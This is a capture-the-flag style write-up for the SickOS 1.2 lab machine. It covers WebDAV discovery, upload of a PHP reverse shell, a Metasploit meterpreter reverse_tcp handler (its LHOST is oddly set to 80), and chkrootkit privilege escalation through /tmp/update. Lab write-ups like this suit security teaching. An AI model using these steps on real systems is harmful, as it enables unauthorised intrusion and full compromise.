# B2R: SickOSv1.2

## Executive Summary

This machine had an unprotected folder which allowed uploading of malicious PHP code which could then be executed remotely. An attacker could then create an unprivileged shell on the victim machine and begin to explore the system for additional vulnerabilities which could lead to a full compromise. During the exploration, an outdated version of chkrootkit was found. By exploiting a known vulnerability in the way chkrootkit parses arguments, an attacker could create a malicious file that would later be run by chkrootkit as a fully privileged user.

## Tools used

• nmap - discovery
• uniscan - web application scanner
• metasploit - exploit framework
• local-linux-enum script - enumeration

## Proof of Concept

In order to cut down on typing, once the IP of the victim computer is discovered, it can be added to the /etc/hosts.

echo "192.168.1.188 vm" >> /etc/hosts


We begin with scanning the victim’s machine and find ports 80 and 22.

❯❯ nmap -p - -A vm | tee nmap.scan


Navigating to the page and checking its source code reveals nothing

Running uniscan, a folder named test is discovered

❯❯ uniscan -qweds -u http://vm/


The listing appeared to be empty but further examination of the /test path revealed that it responded to more than just HTTP methods. COPY and MOVE seemed to indicate WebDAV.

❯❯ curl -vX OPTIONS vm/test


This path requires no authentication and thus allows attackers to upload files to the web server.

Having uploaded the reverse shell, the Meterpreter handler is constructed

set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 80
run -j


curl http://vm/test/sshhh.php

The installed version of chkrootkit is outdated and vulnerable to a code execution exploit.
Using Metasploit, we create another handler and payload, using the chkrootkit module. This module will create/overwrite the /tmp/update file with the reverse tcp shell of your choosing. The next time chkrootkit is run, this update file will connect back to the attacker computer designated in the payload.